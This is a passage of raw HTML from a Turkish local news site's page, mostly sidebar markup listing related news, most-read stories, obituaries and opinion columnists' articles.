        <img src="http://www.elbistaninsesi.com/images/haberler/2021/09/turkoren_hasan_erdogan_ortaokuluna_e_twinning_kalite_etiketi_odulu_h71072_3dd97.jpg" alt="Türkören Hasan Erdoğan Ortaokulu’na e-Twinning kalite etiketi ödülü" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Türkören Hasan Erdoğan Ortaokulu’na e-Twinning kalite etiketi ödülü</span>
          </h2>
          
        </div>
        
      </a>
    </div>
        <div class="item">
      <a href="http://www.elbistaninsesi.com/guncel/erbilen-sigorta-hizmete-basladi-h71071.html" title="Erbilen Sigorta hizmete başladı">

        
        <img src="http://www.elbistaninsesi.com/images/haberler/2021/09/erbilen_sigorta_hizmete_basladi_h71071_e1e1c.JPG" alt="Erbilen Sigorta hizmete başladı" />

                <div class="carousel-caption">

          
                    <h2>
            <span class="hs-o-bgc"  style="font-size:">Erbilen Sigorta hizmete başladı</span>
          </h2>
          
        </div>
        
      </a>
    </div>
      </div>

  <a class="carousel-control left hs-sdch" href="#anamanset" data-slide="prev">&lsaquo;</a>
  <a class="carousel-control right hs-sdch" href="#anamanset" data-slide="next">&rsaquo;</a>

</div>
 </div>
  
    <div class="clearfix galleries">
    <div class="title">
      <span>İlgili Galeriler</span><hr>
    </div>
    <div class="row-fluid">
            <div class="span3">
        <a href="http://www.elbistaninsesi.com/elbistan-tarihi-organizeye-ev-sahipligi-yapti-resimleri,38.html" title="Elbistan, tarihi organizeye ev sahipliği yaptı">
          <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_5431.jpg" alt="Elbistan, tarihi organizeye ev sahipliği yaptı" />
          <b>Elbistan, tarihi organizeye ev sahipliği yaptı</b>
        </a>
      </div>
            <div class="span3">
        <a href="http://www.elbistaninsesi.com/donatir-mobilyadan-hediye-yagmuru-resimleri,37.html" title="Donatır Mobilya’dan hediye yağmuru">
          <img src="http://www.elbistaninsesi.com/images/album/thumbs/donatYr_mobilya_cekiliY_1.jpg" alt="Donatır Mobilya’dan hediye yağmuru" />
          <b>Donatır Mobilya’dan hediye yağmuru</b>
        </a>
      </div>
            <div class="span3">
        <a href="http://www.elbistaninsesi.com/otomobilde-yanarak-can-verdiler-resimleri,36.html" title="Otomobilde yanarak can verdiler">
          <img src="http://www.elbistaninsesi.com/images/album/thumbs/DSC_8860.jpg" alt="Otomobilde yanarak can verdiler" />
          <b>Otomobilde yanarak can verdiler</b>
        </a>
      </div>
          </div>
  </div>
  
  <div id="yorumyap" style="margin:0"></div>
  <div class="clearfix keywords"><div class="title">Anahtar Kelimeler:</div><a href="http://www.elbistaninsesi.com/haberleri/%C3%96ztun%C3%A7%3A+B%C3%BCy%C3%BCk%C5%9Fehir+Belediyesine+aday%C4%B1m" title="Öztunç: Büyükşehir Belediyesine Adayım haberleri">Öztunç: Büyükşehir Belediyesine Adayım</a></div>
  
          </div>

                <!-- Sağ Blok -->
        <div id="sidebar" class="sidebar span4">
          
          
  
  
    <!-- ILGILI HABERLER  -->
  <div id="ilgiliHaberler-y">
    <div class="ilgiliHaberler-y-t glyphicons white show_big_thumbnails hs-bgc text-uppercase">İlgili Haberler</div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/borc-yapilandirma-basvuru-ve-odeme-sureleri-uzatildi-h71103.html"  title="Borç yapılandırma başvuru ve ödeme süreleri uzatıldı">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/09/borc_yapilandirma_basvuru_ve_odeme_sureleri_uzatildi_h71103_7e922.jpg" alt="Borç yapılandırma başvuru ve ödeme süreleri uzatıldı" />
        <span>Borç yapılandırma başvuru ve ödeme süreleri...</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/kaski-su-fiyatlarina-zam-yapti-h71100.html"  title="KASKİ, su fiyatlarına zam yaptı">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/09/kaski_su_fiyatlarina_zam_yapti_h71100_548f0.jpg" alt="KASKİ, su fiyatlarına zam yaptı" />
        <span>KASKİ, su fiyatlarına zam yaptı</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/mikrokredi-ile-7-yilda-hayati-degisti-h71099.html"  title="Mikrokredi ile 7 yılda hayatı değişti">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/09/mikrokredi_ile_7_yilda_hayati_degisti_h71099_ceb9e.jpg" alt="Mikrokredi ile 7 yılda hayatı değişti" />
        <span>Mikrokredi ile 7 yılda hayatı değişti</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/kentparktan-okula-donus-kampanyasi-h71098.html"  title="Kentpark’tan okula dönüş kampanyası">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/09/kentparktan_okula_donus_kampanyasi_h71098_d81da.jpg" alt="Kentpark’tan okula dönüş kampanyası" />
        <span>Kentpark’tan okula dönüş kampanyası</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/kaymakam-demir-yksde-dereceye-giren-ogrencileri-misafir-etti-h71097.html"  title="Kaymakam Demir, YKS’de dereceye giren öğrencileri misafir etti">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/09/kaymakam_demir_yksde_dereceye_giren_ogrencileri_misafir_etti_h71097_a1161.jpg" alt="Kaymakam Demir, YKS’de dereceye giren öğrencileri misafir etti" />
        <span>Kaymakam Demir, YKS’de dereceye giren öğrencileri...</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/igdeliler-derneklerinin-yoneticileri-istisare-toplantisinda-bulustu-h71096.html"  title="İğdeliler Derneklerinin yöneticileri istişare toplantısında buluştu">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/09/igdeliler_derneklerinin_yoneticileri_istisare_toplantisinda_bulustu_h71096_8cc78.JPG" alt="İğdeliler Derneklerinin yöneticileri istişare toplantısında buluştu" />
        <span>İğdeliler Derneklerinin yöneticileri istişare...</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/evcihuyukten-suriye-ye-yardim-eli-h71095.html"  title="Evcihüyük’ten Suriye&#039;ye yardım eli">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/09/evcihuyukten_suriye_ye_yardim_eli_h71095_f56d5.jpg" alt="Evcihüyük’ten Suriye&#039;ye yardım eli" />
        <span>Evcihüyük’ten Suriye&#039;ye yardım eli</span>
      </a>
    </div>
        <div class="ilgiliHaber">
      <a href="http://www.elbistaninsesi.com/guncel/camura-batan-inek-itfaiye-tarafindan-kurtarildi-2-h71094.html"  title="Çamura batan inek, itfaiye tarafından kurtarıldı">
        <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/09/camura_batan_inek_itfaiye_tarafindan_kurtarildi_h71094_9826a.jpg" alt="Çamura batan inek, itfaiye tarafından kurtarıldı" />
        <span>Çamura batan inek, itfaiye tarafından kurtarıldı</span>
      </a>
    </div>
      </div>

  
  <!-- EGAZETE -->
  <div class="egazete">
    <div class="header">
      <h5>E-Gazete</h5>
    </div>
    <div class="content">
            <a href="http://www.elbistaninsesi.com/images/sayfalar/30-Ağustos-2021.jpg" title="Elbistanın Sesi - 30.08.2021 Manşeti" target="_blank"><img src="http://www.elbistaninsesi.com/images/sayfalar/thumb_30-Ağustos-2021.jpg" alt="Elbistanın Sesi - 30.08.2021 Manşeti" /></a>
           </div>
  </div>

  
  <!-- SOSYAL  -->
  <div class="hs-sosyal clearfix">
      <div class="hs-box hs-facebook">
        <div class="top">
          <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/fb32.png" alt="Facebook"></div>
          <div class="right">
            <span class="count"><a href="https://facebook.com/elbistaninsesi" class="hs-sdch" target="blank" id="likes"></a></span>
            <span class="text">Beğeni</span>
          </div>
        </div>
        <div class="bottom">
          <a href="https://facebook.com/elbistaninsesi" target="blank" class="hs-sdch" rel="nofollow">Facebook'ta Beğen</a>
        </div>
      </div>
      <div class="hs-box hs-twitter">
        <div class="top">
          <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/twitter32.png" alt="Twitter"></div>
          <div class="right">
            <span class="count"><a href="https://twitter.com/elbistaninsesi" class="hs-sdch" target="blank" id="followers">99</a></span>
            <span class="text">Takipçi</span>
          </div>
        </div>
        <div class="bottom">
          <a href="https://twitter.com/elbistaninsesi" target="blank" class="hs-sdch" rel="nofollow">Twitter'da Takip Et</a>
        </div>
      </div>

      <div class="hs-box hs-youtube">
          <div class="top">
              <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/youtube.png" alt="Youtube"></div>
          </div>
          <div class="bottom">
              <a href="" target="blank" class="hs-sdch" rel="nofollow">Youtube Abone Ol</a>
          </div>
      </div>

      <div class="hs-box hs-instagram">
          <div class="top">
              <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/instagram.png" alt="instagram"></div>
          </div>
          <div class="bottom">
              <a href="" target="blank" class="hs-sdch" rel="nofollow">Instagram Takip</a>
          </div>
      </div>



  </div>

  

  <!-- ENCOKLAR  -->
  <div class="encoklar">
    <div class="accordion">
    	      	<div class="accordion-group">
        	<div class="accordion-heading hs-bgc">
          		<a class="accordion-toggle hs-sdch" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne">
          			<span class="encoklar-icon"><i class="halflings-icon white fire"></i></span><h5>Bu Ay Çok Okunanlar</h5>
				</a>
        	</div>
        	<div id="collapseOne" class="accordion-body collapse in">
          		<div class="accordion-inner">
            		<ul class="en-list">
              		              			<li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/guncel/elbistanli-genc-kiz-gonulleri-fethetti-h71037.html" title="Elbistanlı genç kız, gönülleri..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/08/elbistanli_genc_kiz_gonulleri_fethetti_h71037_496c1.jpg" alt="Elbistanlı genç kız, gönülleri..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/elbistanli-genc-kiz-gonulleri-fethetti-h71037.html" title="" ><span class="en-hit">1.</span> <strong>Elbistanlı genç kız, gönülleri...</strong> <span class="en-spot en-hidden">ATV’de yayımlanan ve Kenan İmirzalıoğlu&#039;nun sunduğu Kim Milyoner...</span></a></div></li>
              		              			<li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/silahli-saldiriya-ugrayan-genc-yasamini-yitirdi-h71009.html" title="Silahlı saldırıya uğrayan genç,..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/08/silahli_saldiriya_ugrayan_genc_yasamini_yitirdi_h71009_e93b0.jpg" alt="Silahlı saldırıya uğrayan genç,..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/silahli-saldiriya-ugrayan-genc-yasamini-yitirdi-h71009.html" title="" ><span class="en-hit">2.</span> <strong>Silahlı saldırıya uğrayan genç,...</strong> <span class="en-spot en-hidden">Çalışmak için gittiği İstanbul’da tartıştığı kişilerin silahlı...</span></a></div></li>
              		              			<li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/44-yasindaki-adamin-agacta-asili-cansiz-bedenini-piknikciler-h70860.html" title="44 yaşındaki adamın ağaçta asılı..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/08/44_yasindaki_adamin_agacta_asili_cansiz_bedenini_piknikciler_buldu_h70860_666c2.jpg" alt="44 yaşındaki adamın ağaçta asılı..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/44-yasindaki-adamin-agacta-asili-cansiz-bedenini-piknikciler-h70860.html" title="" ><span class="en-hit">3.</span> <strong>44 yaşındaki adamın ağaçta asılı...</strong> <span class="en-spot en-hidden">Elbistan’da, 44 yaşındaki bir adamın ağaçta iple asılı cansız...</span></a></div></li>
              		              			<li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/saganak-yagmur-2-mahallede-sele-donustu-h70825.html" title="Sağanak yağmur 2 mahallede sele dönüştü" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/08/saganak_yagmur_2_mahallede_sele_donustu_h70825_89806.jpg" alt="Sağanak yağmur 2 mahallede sele dönüştü" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/saganak-yagmur-2-mahallede-sele-donustu-h70825.html" title="" ><span class="en-hit">4.</span> <strong>Sağanak yağmur 2 mahallede sele dönüştü</strong> <span class="en-spot en-hidden">Bölgede öğleden sonra etkisini hissettiren sağanak yağış, ilçeye...</span></a></div></li>
              		              			<li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/aslihan-ozer-39-yasinda-h70921.html" title="Aslıhan Özer 39  yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/08/aslihan_ozer_h70921_8bf4f.jpg" alt="Aslıhan Özer 39  yaşında" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/aslihan-ozer-39-yasinda-h70921.html" title="" ><span class="en-hit">5.</span> <strong>Aslıhan Özer 39  yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
              		            		</ul>
          		</div>
        	</div>
      	</div>
              <div class="accordion-group">
        <div class="accordion-heading hs-bgc">
          <a class="accordion-toggle hs-sdch" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo">
            <span class="encoklar-icon"><i class="halflings-icon white comments"></i></span><h5>Bu Ay Çok Yorumlananlar</h5></a>
        </div>
        <div id="collapseTwo" class="accordion-body collapse in">
          <div class="accordion-inner">
            <ul class="en-list">
                            <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/vefatlar/ali-sezer-71-yasinda-h71025.html" title="Ali Sezer 71 Yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/08/ali_sezer_71_yasinda_h71025_540b8.jpg" alt="Ali Sezer 71 Yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/ali-sezer-71-yasinda-h71025.html" title="" ><span class="en-hit">1.</span> <strong>Ali Sezer 71 Yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/aslihan-ozer-39-yasinda-h70921.html" title="Aslıhan Özer 39  yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/08/aslihan_ozer_h70921_8bf4f.jpg" alt="Aslıhan Özer 39  yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/aslihan-ozer-39-yasinda-h70921.html" title="" ><span class="en-hit">2.</span> <strong>Aslıhan Özer 39  yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/fikriye-davdav-h70814.html" title="Fikriye Davdav" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/08/fikriye_davdav_h70814_36c8d.jpg" alt="Fikriye Davdav"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/fikriye-davdav-h70814.html" title="" ><span class="en-hit">3.</span> <strong>Fikriye Davdav</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/hasan-gokduman-82-yasinda-h71065.html" title="Hasan Gökduman 82 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/09/hasan_gokduman_82_yasinda_h71065_3b294.jpg" alt="Hasan Gökduman 82 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/hasan-gokduman-82-yasinda-h71065.html" title="" ><span class="en-hit">4.</span> <strong>Hasan Gökduman 82 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                            <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/memduh-senay-66-yasinda-h70974.html" title="Memduh Şenay 66 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2021/08/memduh_senay_66_yasinda_h70974_38943.jpg" alt="Memduh Şenay 66 yaşında"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/memduh-senay-66-yasinda-h70974.html" title="" ><span class="en-hit">5.</span> <strong>Memduh Şenay 66 yaşında</strong> <span class="en-spot en-hidden"></span></a></div></li>
                          </ul>
          </div>
        </div>
      </div>
        </div>
  </div>

  
  <!-- YAZARLAR -->
  <div id="syazar" class="hs-yazarlar">
    <div class="header">
      <h5><a href="http://www.elbistaninsesi.com/yazarlar/" title="Yazarlar">Yazarlar</a></h5>
            <a class="control left" href="#" id="syprev"></a>
      <a class="control right" href="#" id="synext"></a>
          </div>
    <div class="content">
      <div class="item">
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/tecrube-ile-sabit-13-makale,6313.html" title="TECRÜBE İLE SABİT -13-" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/mehmet-gozukara_1.jpg" alt="Mehmet Gözükara">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/13/mehmet-gozukara" title="Mehmet Gözükara">Mehmet Gözükara</a></h4>
              <a href="http://www.elbistaninsesi.com/tecrube-ile-sabit-13-makale,6313.html" title="TECRÜBE İLE SABİT -13-" >TECRÜBE İLE SABİT -13-</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/elbistan-mukrimin-halil-lisesindeki-talebelik-yillarim-ve-saygideger-hocalarim-makale,6312.html" title="ELBİSTAN MÜKRİMİN HALİL LİSESİNDEKİ TALEBELİK YILLARIM  VE  SAYGIDEĞER HOCALARIM!" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/me.jpg" alt="İlhan Akar">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/81/ilhan-akar" title="İlhan Akar">İlhan Akar</a></h4>
              <a href="http://www.elbistaninsesi.com/elbistan-mukrimin-halil-lisesindeki-talebelik-yillarim-ve-saygideger-hocalarim-makale,6312.html" title="ELBİSTAN MÜKRİMİN HALİL LİSESİNDEKİ TALEBELİK YILLARIM  VE  SAYGIDEĞER HOCALARIM!" >ELBİSTAN MÜKRİMİN HALİL LİSESİNDEKİ TALEBELİK YILLARIM  VE  SAYGIDEĞER HOCALARIM!</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/neden-ortadogu-makale,6311.html" title="NEDEN OR­TA­DO­ĞU" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/ahmet-bulut_1.jpg" alt="Ahmet Bulut">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/11/ahmet-bulut" title="Ahmet Bulut">Ahmet Bulut</a></h4>
              <a href="http://www.elbistaninsesi.com/neden-ortadogu-makale,6311.html" title="NEDEN OR­TA­DO­ĞU" >NEDEN OR­TA­DO­ĞU</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/hayalimiz-duman-oldu-bu-sene-makale,6310.html" title="HAYALİMİZ DUMAN OLDU BU SENE" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Mahir_BaYpYnar.jpg" alt="Mahir Başpınar">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/57/mahir-baspinar" title="Mahir Başpınar">Mahir Başpınar</a></h4>
              <a href="http://www.elbistaninsesi.com/hayalimiz-duman-oldu-bu-sene-makale,6310.html" title="HAYALİMİZ DUMAN OLDU BU SENE" >HAYALİMİZ DUMAN OLDU BU SENE</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/gonul-mevsimleri-makale,6309.html" title="GÖNÜL MEVSİMLERİ" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/11.jpg" alt="Nusret Yılmaz Külekçi">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/74/nusret-yilmaz-kulekci" title="Nusret Yılmaz Külekçi">Nusret Yılmaz Külekçi</a></h4>
              <a href="http://www.elbistaninsesi.com/gonul-mevsimleri-makale,6309.html" title="GÖNÜL MEVSİMLERİ" >GÖNÜL MEVSİMLERİ</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/fark-gormedim-makale,6308.html" title="FARK GÖR­MEDİM" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Yemliha-Gurlek_688_1.jpg" alt="Yemliha Gürlek">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/31/yemliha-gurlek" title="Yemliha Gürlek">Yemliha Gürlek</a></h4>
              <a href="http://www.elbistaninsesi.com/fark-gormedim-makale,6308.html" title="FARK GÖR­MEDİM" >FARK GÖR­MEDİM</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/allah-sizi-cayir-cayir-yakmaz-mi-makale,6307.html" title="ALLAH SİZİ CAYIR CAYIR YAK­MAZ MI" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Nadir-Adbay_499_1.jpg" alt="Mehmet Ayaz">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/6/mehmet-ayaz" title="Mehmet Ayaz">Mehmet Ayaz</a></h4>
              <a href="http://www.elbistaninsesi.com/allah-sizi-cayir-cayir-yakmaz-mi-makale,6307.html" title="ALLAH SİZİ CAYIR CAYIR YAK­MAZ MI" >ALLAH SİZİ CAYIR CAYIR YAK­MAZ MI</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/6698-sayili-kisisel-verilerin-korunmasi-kanunu-makale,6306.html" title="6698 SA­YI­LI KİŞİSEL VERİLERİN KO­RUN­MA­SI KA­NU­NU" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/tara0006.jpg" alt="Av. Fatma Okur">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/100/av-fatma-okur" title="Av. Fatma Okur">Av. Fatma Okur</a></h4>
              <a href="http://www.elbistaninsesi.com/6698-sayili-kisisel-verilerin-korunmasi-kanunu-makale,6306.html" title="6698 SA­YI­LI KİŞİSEL VERİLERİN KO­RUN­MA­SI KA­NU­NU" >6698 SA­YI­LI KİŞİSEL VERİLERİN KO­RUN­MA­SI KA­NU­NU</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/hayata-ne-kattiniz-makale,6305.html" title="HAYATA NE KATTINIZ" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/m-emin-elagoz_1.jpg" alt="M. Emin ELAGÖZ">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/7/m-emin-elagoz" title="M. Emin ELAGÖZ">M. Emin ELAGÖZ</a></h4>
              <a href="http://www.elbistaninsesi.com/hayata-ne-kattiniz-makale,6305.html" title="HAYATA NE KATTINIZ" >HAYATA NE KATTINIZ</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/ilahi-fermankuran-makale,6301.html" title="İLAHİ FER­MAN/KUR’AN" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Ramazan-Pamuk_910_1.jpg" alt="Ramazan Pamuk">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/23/ramazan-pamuk" title="Ramazan Pamuk">Ramazan Pamuk</a></h4>
              <a href="http://www.elbistaninsesi.com/ilahi-fermankuran-makale,6301.html" title="İLAHİ FER­MAN/KUR’AN" >İLAHİ FER­MAN/KUR’AN</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/efkar-tepesi-makale,6300.html" title="EFKAR TEPESİ" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/ceritli.jpg" alt="Celal Ceritli">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/95/celal-ceritli" title="Celal Ceritli">Celal Ceritli</a></h4>
              <a href="http://www.elbistaninsesi.com/efkar-tepesi-makale,6300.html" title="EFKAR TEPESİ" >EFKAR TEPESİ</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/cikmaz-sokaktan-kurtuluyoruz-makale,6298.html" title="Çıkmaz Sokaktan Kurtuluyoruz" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/vesikalYk_a_g.jpeg" alt="Ahmet Göçer">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/3/ahmet-gocer" title="Ahmet Göçer">Ahmet Göçer</a></h4>
              <a href="http://www.elbistaninsesi.com/cikmaz-sokaktan-kurtuluyoruz-makale,6298.html" title="Çıkmaz Sokaktan Kurtuluyoruz" >Çıkmaz Sokaktan Kurtuluyoruz</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/tiktok-makale,6295.html" title="TİKTOK" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Can-Ugur_919_1.jpg" alt="Can Uğur">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/17/can-ugur" title="Can Uğur">Can Uğur</a></h4>
              <a href="http://www.elbistaninsesi.com/tiktok-makale,6295.html" title="TİKTOK" >TİKTOK</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/hasretin-safaginda-azazen-makale,6293.html" title="Has­re­tin şa­fa­ğın­da aza­zen" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/Prof._Dr._Mustafa_Necati_DaglY.jpg" alt="Prof. Dr. Mustafa Necati Daglı">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/90/prof-dr-mustafa-necati-dagli" title="Prof. Dr. Mustafa Necati Daglı">Prof. Dr. Mustafa Necati Daglı</a></h4>
              <a href="http://www.elbistaninsesi.com/hasretin-safaginda-azazen-makale,6293.html" title="Has­re­tin şa­fa­ğın­da aza­zen" >Has­re­tin şa­fa­ğın­da aza­zen</a>
            </div>
          </a>
          </div>
                  <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/kapitalist-burjuva-ve-demokrasi-makale,6290.html" title="KAPİTALİST BURJUVA VE DEMOKRASİ!" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/mehmetcavaY.jpg" alt="Prof.Dr. Mehmet ÇAVAŞ">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/39/profdr-mehmet-cavas" title="Prof.Dr. Mehmet ÇAVAŞ">Prof.Dr. Mehmet ÇAVAŞ</a></h4>
              <a href="http://www.elbistaninsesi.com/kapitalist-burjuva-ve-demokrasi-makale,6290.html" title="KAPİTALİST BURJUVA VE DEMOKRASİ!" >KAPİTALİST BURJUVA VE DEMOKRASİ!</a>
            </div>
          </a>
          </div>
              </div>
      <div class="item">
                <div class="hs-yazar">
            <a href="http://www.elbistaninsesi.com/elbistanin-bilinen-koskerlerinin-tamami-makale,6289.html" title="Elbistan’ın bilinen köşkerlerinin tamamı" >
            <div class="hs-yazar-resim pull-right">
                <img src="http://www.elbistaninsesi.com/images/yazarlar/thumbs/1.jpg" alt="Arif  Bilgin">
            </div>
            <div class="hs-yazar-icerik hs-yazar-orta">
              <h4 class="hs-yazar-baslik"><a href="http://www.elbistaninsesi.com/profil/1/arif-bilgin" title="Arif  Bilgin">Arif  Bilgin</a></h4>
